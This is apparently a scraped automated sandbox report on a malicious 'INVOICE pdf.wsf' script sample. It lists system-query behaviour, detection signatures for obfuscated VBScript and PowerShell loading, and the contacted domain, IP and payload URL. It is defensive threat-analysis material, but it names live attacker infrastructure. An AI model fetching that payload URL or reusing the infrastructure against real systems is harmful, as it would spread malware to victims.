Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428858 Sample: INVOICE pdf.wsf Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 37 originalconceptsinc.ru.com 2->37 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 2 other signatures 2->49 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 53 VBScript performs obfuscated calls to suspicious functions 9->53 55 Suspicious powershell command line found 9->55 57 Wscript starts Powershell (via cmd or directly) 9->57 59 5 other signatures 9->59 12 powershell.exe 14 19 9->12         started        16 PING.EXE 1 9->16         started        18 cmd.exe 1 9->18         started        20 PING.EXE 1 9->20         started        process6 dnsIp7 39 originalconceptsinc.ru.com 216.10.249.248, 49730, 80 PUBLIC-DOMAIN-REGISTRYUS India 12->39 61 Suspicious powershell command line found 12->61 63 Very long command line found 12->63 65 Found suspicious powershell code related to unpacking or dynamic code loading 12->65 22 powershell.exe 17 12->22         started        25 conhost.exe 12->25         started        27 cmd.exe 1 12->27         started        41 127.0.0.1 unknown unknown 16->41 29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        signatures8 process9 signatures10 51 Found suspicious powershell code related to unpacking or dynamic code loading 22->51 35 cmd.exe 1 22->35         started        process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
216.10.249.248
 originalconceptsinc.ru.com India
394695 PUBLIC-DOMAIN-REGISTRYUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
originalconceptsinc.ru.com 216.10.249.248 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfb false
    		unknown